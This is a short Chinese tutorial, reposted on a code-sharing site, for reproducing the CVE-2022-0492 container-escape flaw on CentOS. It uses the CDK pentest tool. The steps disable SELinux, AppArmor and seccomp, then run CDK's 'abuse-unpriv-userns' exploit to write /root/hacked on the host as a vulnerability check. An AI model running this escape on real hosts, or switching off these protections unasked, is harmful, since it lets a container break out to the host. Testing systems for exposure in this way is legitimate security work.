ICode9

精准搜索请尝试: 精确搜索
首页 > 系统相关> 文章详细

centos CVE-2022-0492漏洞复现方法 简单版

2022-04-07 22:00:33  阅读:303  来源: 互联网

标签:&& sysctl namespaces centos 0492 apt cdk etc 2022


1. 下载最新 的 cdk 下载链接 https://github.com/cdk-team/CDK/releases 

2、制作镜像:

FROM ubuntu:20.04
LABEL MAINTAINER kmahyyg<16604643+kmahyyg@users.noreply.github.com>

RUN echo "nameserver 223.5.5.5" > /etc/resolv.conf
RUN sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list && \
apt update -y && \
apt install -y ca-certificates wget curl nano strace ltrace socat libcap2-bin && \
rm -rf /var/cache/apt

CMD ["/bin/bash", "-c", "sleep 9999"]

docker build -t test:1 .

3. 临时关闭selinux 

setenforce 0

开启用户命名空间

echo user.max_user_namespaces=15000 >/etc/sysctl.d/90-max_net_namespaces.conf'
sysctl -p /etc/sysctl.d /etc/sysctl.d/90-max_net_namespaces.conf

4.docker run -d  --security-opt "seccomp=unconfined" --security-opt "apparmor=unconfined"  test:1

使用docker cp把 cdk 放到/home/下给执行权限

容器内执行:./cdk run abuse-unpriv-userns "touch /root/hacked"

查看宿主机是否有  /root/hacked 目录有了则存在漏洞




标签:&&,sysctl,namespaces,centos,0492,apt,cdk,etc,2022
来源: https://www.cnblogs.com/rincloud/p/16114479.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有